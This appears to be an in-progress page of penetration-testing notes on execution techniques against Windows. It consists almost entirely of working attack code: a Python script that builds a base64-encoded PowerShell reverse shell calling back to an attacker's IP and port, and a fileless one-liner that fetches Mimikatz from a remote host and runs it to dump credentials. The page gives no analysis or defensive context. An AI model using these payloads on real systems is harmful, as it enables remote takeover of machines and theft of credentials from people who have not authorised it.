Execution
This chapter is in-progress.
Check the index on the right to navigate this page more easily.
Windows Powershell Reverse Shell (Base64 encoded)
#!/usr/bin/env python3
#
# generate reverse powershell cmdline with base64 encoded args
#
import sys
import base64
def help():
print("USAGE: %s IP PORT" % sys.argv[0])
print("Returns reverse shell PowerShell base64 encoded cmdline payload connecting to IP:PORT")
exit()
try:
(ip, port) = (sys.argv[1], int(sys.argv[2]))
except:
help()
# payload from Nikhil Mittal @samratashok
# https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3
payload = '$client = New-Object System.Net.Sockets.TCPClient("%s",%d);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
payload = payload % (ip, port)
cmdline = "powershell -e " + base64.b64encode(payload.encode('utf16')[2:]).decode()
print(cmdline)Penelope Listener
Mimikatz (Fileless)
powershell "IEX (New-Object Net.WebClient).DownloadString('http://<IP>/<mimikatz location>'); Invoke-Mimikatz -DumpCreds"Last updated
